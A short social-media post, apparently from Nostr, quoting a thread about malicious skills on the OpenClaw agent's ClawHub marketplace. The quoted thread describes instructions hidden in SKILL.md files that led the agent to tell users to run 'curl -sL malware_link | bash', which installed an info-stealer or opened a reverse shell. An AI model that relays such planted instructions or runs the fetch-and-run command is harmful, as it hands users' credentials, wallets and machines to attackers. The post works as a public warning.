Anyone with 3 functioning brain cells would know not to install a cryptoe trading bot.
You can’t help some ppl. And also, who cares
quotingthe #1 most downloaded skill on OpenClaw marketplace was MALWARE
nevent1q…98g5
it stole your SSH keys, crypto wallets, browser cookies, and opened a reverse shell to the attackers server
1,184 malicious skills found, one attacker uploaded 677 packages ALONE
OpenClaw has a skill marketplace called ClawHub where anyone can upload plugins
you install a skill, your AI agent gets new powers, this sounds great
the problem? ClawHub let ANYONE publish with just a 1 week old github account
attackers uploaded skills disguised as crypto trading bots, youtube summarizers, wallet trackers. the documentation looked PROFESSIONAL
but hidden in the SKILL .md
file were instructions that tricked the AI into telling you to run a command
> to enable this feature please run: curl -sL malware_link | bash
that one command installed Atomic Stealer on macOS
it grabbed your browser passwords, SSH keys, Telegram sessions, crypto wallets, keychains, and every API key in your .env files
on other systems it opened a REVERSE SHELL giving the attacker full remote control of your machine.